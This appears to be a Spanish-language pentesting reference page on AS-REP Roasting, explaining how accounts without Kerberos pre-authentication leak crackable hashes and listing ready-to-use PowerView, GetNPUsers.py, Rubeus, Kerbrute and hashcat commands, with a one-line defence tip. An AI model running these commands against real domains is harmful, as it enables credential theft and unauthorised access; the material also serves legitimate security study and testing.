Credenciales

AS-REP Roasting

Cómo un atacante saca material de credenciales de cuentas sin preautenticación de Kerberos y lo descifra fuera de línea.

Qué es

AS-REP Roasting saca material cifrado del KDC de una cuenta que tiene la preautenticación de Kerberos desactivada. El atacante lo descifra fuera de línea y recupera la contraseña en texto plano si es débil.

Cómo funciona

El KDC exige un paso previo: el cliente cifra una marca de tiempo con el hash de su contraseña antes de recibir cualquier ticket. Eso es la preautenticación. Si una cuenta la tiene desactivada, el KDC responde a cualquier AS-REQ sin validar la identidad del que pide. Devuelve un AS-REP con un bloque cifrado con el hash de esa cuenta. El atacante captura ese bloque y lo somete a fuerza bruta o diccionario fuera de línea. No hace falta una credencial del dominio: basta el nombre de usuario y acceso al puerto 88.

Diagrama

Comandos

Enumerar cuentas sin preautenticación con PowerView, desde una sesión ya autenticada:

Get-DomainUser -PreauthNotRequired | Select-Object samaccountname

Pedir el AS-REP sin credenciales, con una lista de usuarios:

GetNPUsers.py <DOMAIN>/ -no-pass -usersfile <FILE> -dc-ip <IP> -format hashcat -outputfile <FILE>

Con credenciales, enumerar y pedir en un solo paso:

GetNPUsers.py <DOMAIN>/<USER>:<PASSWORD> -dc-ip <IP> -request -format hashcat -outputfile <FILE>

Desde un host de dominio en Windows, con Rubeus:

Rubeus.exe asreproast /format:hashcat /nowrap /outfile:<FILE>

Validar los nombres de usuario antes del ataque, con Kerbrute:

kerbrute userenum -d <DOMAIN> --dc <IP> <FILE>

Descifrar el hash capturado con hashcat:

hashcat -m 18200 <FILE> <WORDLIST>

Cómo defenderse

Reactiva la preautenticación de Kerberos en toda cuenta que la tenga desactivada sin una justificación documentada.

Siguiente

Puedes seguir leyendo aquí:

EscaladaAbuso de Unconstrained Delegation

No te pierdas ninguna noticia

Recibe un correo cuando haya alguna actualización importante.

Al suscribirte aceptas la política de privacidad.